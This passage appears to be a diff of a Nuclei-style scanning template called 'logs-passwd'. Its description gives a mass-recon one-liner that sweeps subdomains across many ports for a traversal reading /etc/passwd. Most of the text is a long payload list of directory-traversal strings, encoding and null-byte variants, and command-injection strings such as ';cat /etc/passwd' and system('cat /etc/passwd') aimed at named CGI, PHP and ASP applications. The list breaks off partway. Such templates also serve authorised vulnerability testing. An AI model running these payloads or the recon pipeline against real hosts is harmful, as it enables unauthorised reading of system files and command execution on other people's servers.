Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
-
-
1 + id: logs-passwd 2 + info: 3 + name: logs-passwd 4 + severity: high 5 + author: 6 + - 51pwn 7 + description: |- 8 + cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60 9 + 10 + requests: 11 + - raw: 12 + - | 13 + GET /{{path1}} HTTP/1.1 14 + Host: {{Hostname}} 15 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 16 + 17 + payloads: 18 + path1: 19 + - "%00../../../../../../etc/passwd" 20 + - "%00/etc/passwd%00" 21 + - "%0a/bin/cat%20/etc/passwd" 22 + - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 23 + - "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd" 24 + - "................../etc/passwd" 25 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 26 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 27 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 28 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 29 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 30 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 31 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 32 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 33 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 34 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 35 + - "....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 36 + - "....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 37 + - "....//....//....//....//....//....//....//....//....//....//etc/passwd" 38 + - "....//....//....//....//....//....//....//....//....//etc/passwd" 39 + - "....//....//....//....//....//....//....//....//etc/passwd" 40 + - "....//....//....//....//....//....//....//etc/passwd" 41 + - "....//....//....//....//....//....//etc/passwd" 42 + - "....//....//....//....//....//etc/passwd" 43 + - "....//....//....//....//etc/passwd" 44 + - "....//....//....//etc/passwd" 45 + - "....//....//etc/passwd" 46 + - "....//etc/passwd" 47 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 48 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 49 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 50 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 51 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 52 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 53 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 54 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 55 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 56 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 57 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 58 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 59 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 60 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 61 + - ....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 62 + - ....\/....\/....\/....\/....\/....\/....\/etc/passwd 63 + - ....\/....\/....\/....\/....\/....\/etc/passwd 64 + - ....\/....\/....\/....\/....\/etc/passwd 65 + - ....\/....\/....\/....\/etc/passwd 66 + - ....\/....\/....\/etc/passwd 67 + - ....\/....\/etc/passwd 68 + - ....\/etc/passwd" 69 + - ".../.../.../.../.../.../.../.../.../.../etc/passwd" 70 + - "../../../../../../../../../../../../../../../../../../../../../../etc/passwd" 71 + - "../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" 72 + - "../../../../../../../../../../../../../../../../../../../../../etc/passwd" 73 + - "../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" 74 + - "../../../../../../../../../../../../../../../../../../../../etc/passwd" 75 + - "../../../../../../../../../../../../../../../../../../../../etc/passwd%00" 76 + - "../../../../../../../../../../../../../../../../../../../etc/passwd" 77 + - "../../../../../../../../../../../../../../../../../../../etc/passwd%00" 78 + - "../../../../../../../../../../../../../../../../../../etc/passwd" 79 + - "../../../../../../../../../../../../../../../../../../etc/passwd%00" 80 + - "../../../../../../../../../../../../../../../../../etc/passwd" 81 + - "../../../../../../../../../../../../../../../../../etc/passwd%00" 82 + - "../../../../../../../../../../../../../../../../etc/passwd" 83 + - "../../../../../../../../../../../../../../../../etc/passwd%00" 84 + - "../../../../../../../../../../../../../../../etc/passwd" 85 + - "../../../../../../../../../../../../../../../etc/passwd%00" 86 + - "../../../../../../../../../../../../../../etc/passwd" 87 + - "../../../../../../../../../../../../../../etc/passwd%00" 88 + - "../../../../../../../../../../../../../etc/passwd" 89 + - "../../../../../../../../../../../../../etc/passwd%00" 90 + - "../../../../../../../../../../../../etc/passwd" 91 + - "../../../../../../../../../../../../etc/passwd%00" 92 + - "../../../../../../../../../../../etc/passwd" 93 + - "../../../../../../../../../../../etc/passwd%00" 94 + - "../../../../../../../../../../etc/passwd" 95 + - "../../../../../../../../../../etc/passwd%00" 96 + - "../../../../../../../../../etc/passwd" 97 + - "../../../../../../../../../etc/passwd%00" 98 + - "../../../../../../../../etc/passwd" 99 + - "../../../../../../../../etc/passwd%00" 100 + - "../../../../../../../etc/passwd" 101 + - "../../../../../../../etc/passwd%00" 102 + - "../../../../../../etc/passwd" 103 + - "../../../../../../etc/passwd%00" 104 + - "../../../../../../etc/passwd&=%3C%3C%3C%3C" 105 + - "../../../../../etc/passwd" 106 + - "../../../../../etc/passwd%00" 107 + - "../../../../etc/passwd" 108 + - "../../../../etc/passwd%00" 109 + - "../../../etc/passwd" 110 + - "../../../etc/passwd%00" 111 + - "../../etc/passwd" 112 + - "../../etc/passwd%00" 113 + - "../etc/passwd" 114 + - "../etc/passwd%00" 115 + - ".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd" 116 + - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 117 + - "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" 118 + - "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd" 119 + - "../../../../../../../../../../../etc/passwd%00.html" 120 + - "../../../../../../../../../../../etc/passwd%00.jpg" 121 + - "../../../../../../../../../../etc/passwd" 122 + - "../../../../../../../../../../etc/passwd^^" 123 + - /..\../..\../..\../..\../..\../..\../etc/passwd 124 + - "./././././././././././etc/passwd" 125 + - "//////../../../../../../etc/passwd" 126 + - "//////../../../etc/passwd" 127 + - "/etc/passwd" 128 + - "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/" 129 + - "cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd" 130 + - "cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 131 + - "etc/passwd" 132 + - "etc/passwd%00" 133 + - "etc/passwd-" 134 + - "etc/passwd~" 135 + - "logs/downloadMainLog?fname=../../../../../../..//etc/passwd" 136 + - "src/etc/passwd" 137 + - "14all-1.1.cgi?cfg=../../../../../../../../etc/passwd" 138 + - "14all.cgi?cfg=../../../../../../../../etc/passwd" 139 + - "DomainFiles/*//../../../../../../../../../../etc/passwd" 140 + - "FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 141 + - "FileSeek.cgi?head=&foot=;cat%20/etc/passwd" 142 + - "FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 143 + - "FileSeek.cgi?head=;cat%20/etc/passwd|&foot=" 144 + - "FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 145 + - "FileSeek2.cgi?head=&foot=;cat%20/etc/passwd" 146 + - "FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 147 + - "FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=" 148 + - "PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00" 149 + - "PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd" 150 + - "ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00" 151 + - "Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html" 152 + - "YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00" 153 + - "\\'/bin/cat%20/etc/passwd\\'" 154 + - "a1disp3.cgi?../../../../../../../../../../etc/passwd" 155 + - "a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd" 156 + - "a1stats/a1disp3.cgi?../../../../../../../etc/passwd" 157 + - "a1stats/a1disp4.cgi?../../../../../../../etc/passwd" 158 + - "admin.cgi?list=../../../../../../../../../../etc/passwd" 159 + - "admin/exec.php3?cmd=cat%20/etc/passwd" 160 + - "admin/system.php3?cmd=cat%20/etc/passwd" 161 + - "albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd" 162 + - "anacondaclip.pl?template=../../../../../../../../../../etc/passwd" 163 + - "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/" 164 + - "athenareg.php?pass=%20;cat%20/etc/passwd" 165 + - "atomicboard/index.php?location=../../../../../../../../../../etc/passwd" 166 + - "auktion.cgi?menue=../../../../../../../../../../etc/passwd" 167 + - "autohtml.php?op=modload&mainfile=x&name=/etc/passwd" 168 + - "base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1" 169 + - "basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu" 170 + - "bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd" 171 + - "bb-hist?HISTFILE=../../../../../../../../../../etc/passwd" 172 + - "bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd" 173 + - "bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=" 174 + - "book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10" 175 + - "cal_make.pl?p0=../../../../../../../../../../etc/passwd%00" 176 + - "calendar/calendar_admin.pl?config=|cat%20/etc/passwd|" 177 + - "calendar_admin.pl?config=|cat%20/etc/passwd|" 178 + - "campas?%0acat%0a/etc/passwd%0a" 179 + - "cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd" 180 + - "cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd" 181 + - "cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 182 + - "cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd" 183 + - "cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 184 + - "cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=" 185 + - "cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 186 + - "cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd" 187 + - "cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 188 + - "cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=" 189 + - "cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00" 190 + - "cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd" 191 + - "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd" 192 + - "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd" 193 + - "cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd" 194 + - "cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd" 195 + - "cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd" 196 + - "cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/" 197 + - "cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd" 198 + - "cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd" 199 + - "cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd" 200 + - "cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd" 201 + - "cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=" 202 + - "cgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10" 203 + - "cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00" 204 + - "cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|" 205 + - "cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|" 206 + - "cgi-bin/campas?%0acat%0a/etc/passwd%0a" 207 + - "cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00" 208 + - "cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html" 209 + - "cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd" 210 + - "cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 211 + - "cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 212 + - "cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 213 + - "cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 214 + - "cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`" 215 + - "cgi-bin/db4web_c/dbdirname//etc/passwd" 216 + - "cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00" 217 + - "cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00" 218 + - "cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 219 + - "cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 220 + - "cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 221 + - "cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" 222 + - "cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1" 223 + - "cgi-bin/faqmanager.cgi?toc=/etc/passwd%00" 224 + - "cgi-bin/faxsurvey?cat%20/etc/passwd" 225 + - "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 226 + - "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 227 + - "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 228 + - "cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1" 229 + - "cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|" 230 + - "cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00" 231 + - "cgi-bin/htgrep?file=index.html&hdr=/etc/passwd" 232 + - "cgi-bin/htmlscript?../../../../../../../../../../etc/passwd" 233 + - "cgi-bin/htsearch?exclude=%60/etc/passwd%60" 234 + - "cgi-bin/ion-p?page=../../../../../etc/passwd" 235 + - "cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd" 236 + - "cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd" 237 + - "cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 238 + - "cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00" 239 + - "cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd" 240 + - "cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd" 241 + - "cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd" 242 + - "cgi-bin/multihtml.pl?multi=/etc/passwd%00html" 243 + - "cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd" 244 + - "cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd" 245 + - "cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 246 + - "cgi-bin/opendir.php?/etc/passwd" 247 + - "cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd" 248 + - "cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'" 249 + - "cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd" 250 + - "cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'" 251 + - "cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd" 252 + - "cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd" 253 + - "cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20" 254 + - "cgi-bin/php.cgi?/etc/passwd" 255 + - "cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd" 256 + - "cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10" 257 + - "cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=" 258 + - "cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd" 259 + - "cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1" 260 + - "cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00" 261 + - "cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd" 262 + - "cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd" 263 + - "cgi-bin/shop.cgi?page=../../../../../../../etc/passwd" 264 + - "cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd" 265 + - "cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|" 266 + - "cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|" 267 + - "cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 268 + - "cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 269 + - "cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 270 + - "cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html" 271 + - "cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd" 272 + - "cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00" 273 + - "cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00" 274 + - "cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1" 275 + - "cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd" 276 + - "cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd" 277 + - "cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd" 278 + - "cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd" 279 + - "cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00" 280 + - "cgi-bin/viewsource?/etc/passwd" 281 + - "cgi-bin/way-board.cgi?db=/etc/passwd%00" 282 + - "cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00" 283 + - "cgi-bin/webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd" 284 + - "cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD" 285 + - "cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 286 + - "cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 287 + - "cgi-bin/webplus?script=../../../../../../../../../../etc/passwd" 288 + - "cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd" 289 + - "cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 290 + - "cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 291 + - "cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd" 292 + - "cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00" 293 + - "cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00" 294 + - "cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00" 295 + - "commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html" 296 + - "common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd" 297 + - "content/base/build/explorer/none.php?/etc/passwd" 298 + - "csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 299 + - "csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 300 + - "csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 301 + - "csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 302 + - "csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`" 303 + - "current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00" 304 + - "current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1" 305 + - "db4web_c/dbdirname//etc/passwd" 306 + - "dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00" 307 + - "dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00" 308 + - "dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00" 309 + - "directory.php?dir=%3Bcat%20/etc/passwd" 310 + - "directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00" 311 + - "edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd" 312 + - "emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 313 + - "emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 314 + - "emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00" 315 + - "emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 316 + - "etc/passwd" 317 + - "ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1" 318 + - "ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" 319 + - "ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1" 320 + - "faqmanager.cgi?toc=/etc/passwd%00" 321 + - "faxsurvey?cat%20/etc/passwd" 322 + - "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 323 + - "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 324 + - "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 325 + - "forum-ra.asp?n=../../../../../../../../../etc/passwd" 326 + - "forum-ra.asp?n=../../../../../../../../../etc/passwd%00" 327 + - "forum-ra.asp?n=/etc/passwd" 328 + - "forum-ra.asp?n=/etc/passwd%00" 329 + - "forum-ra_professionnel.asp?n=%60/etc/passwd%60" 330 + - "forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00" 331 + - "forum-ra_professionnel.asp?n=/../../../../../../etc/passwd" 332 + - "forum-ra_professionnel.asp?n=/../../../etc/passwd" 333 + - "forum-ra_professionnel.asp?n=/etc/passwd" 334 + - "forum-ra_professionnel.asp?n=/etc/passwd%00" 335 + - "forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 336 + - "forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 337 + - "forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 338 + - "forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 339 + - "forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 340 + - "forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 341 + - "forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 342 + - "forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 343 + - "forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 344 + - "forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 345 + - "forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 346 + - "forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 347 + - "forum1.asp?n=1753&nn=%60/etc/passwd%60" 348 + - "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd" 349 + - "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00" 350 + - "forum1.asp?n=1753&nn=/etc/passwd" 351 + - "forum1.asp?n=1753&nn=/etc/passwd%00" 352 + - "forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 353 + - "forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren" 354 + - "forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec" 355 + - "forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 356 + - "forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 357 + - "forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1" 358 + - "forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1" 359 + - "forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1" 360 + - "forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1" 361 + - "forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1" 362 + - "forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60" 363 + - "forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00" 364 + - "forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd" 365 + - "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd" 366 + - "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00" 367 + - "forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 368 + - "forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 369 + - 